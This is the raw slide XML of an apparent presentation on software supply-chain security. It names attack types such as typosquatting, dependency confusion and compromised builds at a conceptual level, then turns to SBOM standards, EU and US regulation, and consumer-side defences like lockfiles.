          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749808" y="180136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F79DA0C-9F50-0642-A59C-DDF778673B5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74980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B332B0DD-AEEA-D94D-AA27-46A3877C4966}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261872" y="18013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Typosquatting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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DF26140-250A-0F47-8B58-723BC65ADFCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749808" y="2331720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package named one keystroke from the real one.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="v1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF4EE3D1-A6F3-2250-792F-9F680E1B7E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4297680" y="1618488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FBF0B118-AC86-B522-A482-4523CE783F11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498848" y="180136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BE0D19D-BC50-2F42-2383-FDAD9FC721F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449884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5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59BB4B8-299D-E96E-5C6F-CF1F5545DA9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5010912" y="18013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Account takeover</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="150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70CC79C2-911A-0F7B-629F-2F4BB4C17AEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498848" y="2331720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Phished or leaked maintainer credentials.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="v2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{196238A8-3867-391D-3401-3697F22748EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8046720" y="1618488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2F929BA-2FBA-E438-55AA-3220EC026418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="1801368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20DB0975-7251-BAFB-EB92-8B59A9E123DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="1801368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5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651F17B6-FA35-720C-C57B-8D6C3D43676F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8759952" y="1801368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Malicious maintainer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="150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4B0F6FB8-FDCC-4CD4-7032-73CB38790E54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="2331720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“helpful volunteer” who turns on the project.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="v3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEE0996D-EDF7-E3F5-BB9F-1A4ADBCE0F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3429000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7F4EAFB6-E575-F1D6-675A-F9CDB9D4F8E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749808" y="36118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F906421-7A8F-4897-21A4-E940A3D9B1D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74980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500" dirty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ECEC13F-8FBE-D640-2DEC-81C4447121B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261872" y="36118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Compromised build</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty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C9998C15-ED9A-9C9F-5AFD-D39F3E3DA593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749808" y="4142232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factory is owned — source stays clean (SolarWinds).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="v4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4200965E-F853-936A-114B-8304E9261D6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4297680" y="3429000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25" name="Shape 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3828EAE7-7C01-D8F0-0C40-7E9B1AF6B949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498848" y="36118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9B3842AA-1C6D-1F78-B48E-9BFD9FB4B112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449884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500" dirty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A9FF58A2-603F-AC29-4FBD-6F269C4C7C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5010912" y="36118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Dependency confusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty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4FFBF4D6-9BC3-6B3C-238E-99B277E418DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498848" y="4142232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Public name shadows your private package.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="v5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4952CB1E-7931-A297-ACB6-D68ACF2E8908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8046720" y="3429000"/>
            <a:ext cx="3566160" cy="1627632"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5056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30" name="Shape 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7FF2B67-9794-699B-7D72-DD74FCE27554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="3611880"/>
            <a:ext cx="384048" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14286"/>
            </a:avLst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5008628B-909C-4007-7169-7A9BE2BAAEBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="361188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6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67994E37-E0BE-1422-9AA6-8A8271787E20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8759952" y="3611880"/>
            <a:ext cx="2651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Compromised CI/CD</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty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A2FF6658-602C-62EB-754D-33176A19C928}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="4142232"/>
            <a:ext cx="316382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poisoned Action or runner leaks your secrets.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474923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C29DFD9C-AA87-CBCB-7B83-06D5AA120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FD9BD45-8893-81BF-92D4-8CA5A6019073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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1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trust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1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itself is the risk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="t0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13302C3B-D304-A5A9-BAC0-742BD307485A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1618488"/>
            <a:ext cx="5486400" cy="1664208"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 494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B8B2A09-169C-D21D-FC35-D95669A43B56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="180136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pick 20, you get 1,000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="165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EDEE682-CC37-1B5E-500A-5A8AFD2EF941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="2276856"/>
            <a:ext cx="49743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35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Transitive dependencies: you choose a handful of packages and inherit a thousand you never read.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="t1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5A41F89-7221-3BF9-357B-C376534F7D72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217920" y="1618488"/>
            <a:ext cx="5486400" cy="1664208"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 494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F7013DA-B13E-0BC8-1B8C-609C54537315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473952" y="180136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Critical infra, 1–2 volunteers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="165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C3C7543-AC4D-DD99-50B1-6F4718EF6A2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473952" y="2276856"/>
            <a:ext cx="49743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35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Much of what runs the internet is maintained by one or two unpaid people. (XKCD 2347 belongs on this slide.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="t2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26742EE1-9332-019E-A6C7-C3A6E5483011}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3447288"/>
            <a:ext cx="5486400" cy="1664208"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 494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C24A5E3-A8FC-5A3E-E705-D70BB0B32268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="363016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 software runs with the keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="165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61D9279-ACE1-EFDD-82EA-C71665CBFB5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="4105656"/>
            <a:ext cx="49743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35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Monitoring &amp; agent tools run with high privilege and broad network access. SolarWinds could see everything.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="t3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8564806-DB42-9B1D-5773-5405ED37CF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217920" y="3447288"/>
            <a:ext cx="5486400" cy="1664208"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4945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387A48FF-9AB6-459E-8B3E-FA2B05425F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473952" y="3630168"/>
            <a:ext cx="497433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b="1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Auto-updates: shield and vector</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="165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82EF0AB-E765-0DD3-FE78-390866D18749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473952" y="4105656"/>
            <a:ext cx="49743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35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same mechanism that patches you is the one that ships the backdoor.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Photo overlay - auto hide after 7 seconds" descr="15u8ug0fz0d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8579" y="342900"/>
            <a:ext cx="4494841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119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A2A7A526-875F-9C88-DC72-98D0D6500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C0B28DBB-BEF3-E5EB-1D37-D5ACF0FCADC3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SBOM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the ingredients list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159BE3C-65EC-C304-0A74-B61593ED1F86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SOFTWARE BILL OF MATERIALS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="w">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BB5CB4B-83D0-FC11-C0B4-13E02CFA10C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1755648"/>
            <a:ext cx="6583680" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2222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65BD013-484A-D966-69CA-EDAADCF8B32E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="19202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What’s in the box</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="180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A032D268-59F4-DD51-624C-CBB24FD0D3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2377440"/>
            <a:ext cx="60350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Components, versions, licenses, hashes, dependencies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p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Standard formats: SPDX and CycloneDX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="177800" indent="-177800" algn="l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VEX complements it: does a given CVE actually affect your product?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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B6B809F-D8D3-9774-320B-1F6FE6F0C376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="50749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Tooling: syft (generate) · grype / trivy (scan) · cdxgen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="v">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496787A2-3D58-C0F9-6D13-4EDE79B5D4F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="1755648"/>
            <a:ext cx="4297680" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2222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2650C0F-E8EE-E9BB-19EC-3BADF30A5BF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7589520" y="19202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Why it pays off</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="180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A70BA95-15FA-BB61-DD6E-79CD63E9AD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7589520" y="2377440"/>
            <a:ext cx="374904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6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When Log4Shell drops, the answer to </a:t>
            </a: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“are we affected?”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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becomes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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not a week of panic.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200719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6E44D598-725B-1492-78C1-B30A084272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98C08FD-504B-7C8A-D10F-CD1EC428F054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SBOM: the law, and the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honest caveat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="reg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EA6FE5D-B112-E221-36FE-21EAD28AA292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1755648"/>
            <a:ext cx="6583680" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2222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AB623E2-D4CA-4CF8-FCCC-321C442F9FBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="192024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Regulation is arriving</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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2A32952-E85A-61CF-A8B4-2C971AA29DA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2377440"/>
            <a:ext cx="5943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US Executive Order 14028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(2021) first pushed SBOM into procurement.
</a:t>
            </a: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EU Cyber Resilience Act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more relevant here: it requires an SBOM and vulnerability management for products with digital elements on the EU market.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty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4D13579-8346-6B3C-2161-5BCFCBC79C5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="5074920"/>
            <a:ext cx="6035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Reporting duties from Sep 2026</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="13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  ·   full application from Dec 2027</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="cav">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8FE3345-9E1C-7162-A68F-6E5950507CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="1755648"/>
            <a:ext cx="4297680" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2222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95C5DCD4-B983-E02F-5EF5-23EEEBEC248F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7589520" y="1920240"/>
            <a:ext cx="3749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6C65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Be honest with the room</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="180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B780409-4922-60A4-2514-9A59DCB536B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7589520" y="2377440"/>
            <a:ext cx="374904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SBOM would </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6B6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have stopped SolarWinds or xz.</a:t>
            </a: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 helps you </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="112000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="155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react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not </a:t>
            </a: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prevent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. That distinction matters.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26277983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0A52AC9E-2A70-65A6-E230-3D0C606655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7B222E3-99DE-9D2B-31A2-D6F3E4DDBBFB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Defense — as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consumer of dependencies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3C6C7E4-A4BB-204D-A291-AF913B46F668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PULL THE CODE — CONTROL HOW YOU PULL IT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="d">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFB818FB-59F7-85D9-D174-4966DD185EA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1709928"/>
            <a:ext cx="11064240" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2143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A4CC1347-0171-D4CC-607E-9E49DF7FF885}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2057400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79F7389-3C6D-0F66-43A1-83D4D5E1EA3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="1947672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Lockfiles + npm ci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Hash-pinned installs in CI instead of npm install.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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724BF167-857F-9968-E6C4-E18BE7590D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="275234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6AD40F87-452D-CA3E-6179-747F60FB8B74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
